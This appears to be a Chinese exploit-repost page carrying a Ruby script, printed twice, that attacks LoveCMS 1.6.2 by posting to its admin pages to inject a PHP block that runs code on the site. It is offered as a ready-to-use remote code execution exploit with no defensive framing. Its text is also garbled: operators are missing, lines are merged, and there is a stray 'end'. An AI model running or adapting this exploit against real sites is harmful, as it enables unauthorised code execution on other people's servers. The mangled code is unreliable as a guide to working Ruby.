您现在的位置是:网站首页> 编程资料编程资料
LoveCMS 1.6.2 Final Remote Code Execution Exploit _Exploit_网络安全_
2023-12-10
262人已围观
简介 LoveCMS 1.6.2 Final Remote Code Execution Exploit _Exploit_网络安全_
#!/usr/bin/ruby
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 1: adding a side block
##
## Description: add some php into a block container
## on the side of the site. phpinfo() is called.
##
## Usage: ./LoveCMS_1_blocks.rb
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
# require 'net/http'
require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]
@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host
# --
puts " LoveCMS Exploit Series. #1: Adding side blocks."
puts
puts " : Attacking host: " @host # --
# Insert a new block
res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),
{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})
puts " :: Block inserted." # --
# Build post variable for next step
post_vars = {'submit' => 1}
(1..50).each do |id|
post_vars['position' id.to_s] = 1
post_vars['height' id.to_s] = 1
post_vars['visible' id.to_s] = 1
end
# Make the block visible
res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )
puts " :: Blocks displayed." # --
puts
puts " - Visit " @host
end
#
## Exploit by PoMdaPiMp!
## ---------------------
## pomdapimp(at)gmail(dotcom)
##
## LoveCMS Exploit Series
## Episode 1: adding a side block
##
## Description: add some php into a block container
## on the side of the site. phpinfo() is called.
##
## Usage: ./LoveCMS_1_blocks.rb
## Ex: ./LoveCMS_2_themes.rb http://site.com/lovecms/
##
## Tested on: lovecms_1.6.2_final (MacOS X, Xampp)
# require 'net/http'
require 'uri' @host = 'http://127.0.0.1/lovecms_1.6.2_final/lovecms/' @host = ARGV[0] if ARGV[0]
@host = @host[-1, 1].to_s != '/' ? '/' : '' if @host
# --
puts " LoveCMS Exploit Series. #1: Adding side blocks."
puts
puts " : Attacking host: " @host # --
# Insert a new block
res = Net::HTTP.post_form(URI.parse(@host 'system/admin/addblock.php'),
{'submit'=>'1', 'title'=>'H4Ck', 'content' => 'phpinfo();', 'type' => 'php'})
puts " :: Block inserted." # --
# Build post variable for next step
post_vars = {'submit' => 1}
(1..50).each do |id|
post_vars['position' id.to_s] = 1
post_vars['height' id.to_s] = 1
post_vars['visible' id.to_s] = 1
end
# Make the block visible
res = Net::HTTP.post_form(URI.parse('http://127.0.0.1/lovecms_1.6.2_final/lovecms/system/admin/blocks.php'), post_vars )
puts " :: Blocks displayed." # --
puts
puts " - Visit " @host
end
相关内容
- BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (spoof on ircd) _Exploit_网络安全_
- TGS CMS 0.3.2r2 Remote Code Execution Exploit _Exploit_网络安全_
- JS异步编程之generator与async/await语法糖详解_javascript技巧_
- 神魔鬼将队伍最强搭配阵容TOP7推荐_手机游戏_游戏攻略_
- 天天飞车6月30日最新破解版葫芦侠刷分刷金币不异常教程攻略_手机游戏_游戏攻略_
- 天天酷跑小单车怎么得_手机游戏_游戏攻略_
- 天天飞车最强金币任务活动介绍 活动奖励是什么?_手机游戏_游戏攻略_
- 天天飞车达人秀活动怎么玩? 天天飞车达人秀活动介绍 _手机游戏_游戏攻略_
- 天天飞车达人秀6月28日获奖名单列表 天天飞车达人秀6月28日获奖选手介绍_手机游戏_游戏攻略_
- 刀塔传奇新版月骑怎么样_刀塔传奇新版月骑属性技能全面解析_手机游戏_游戏攻略_
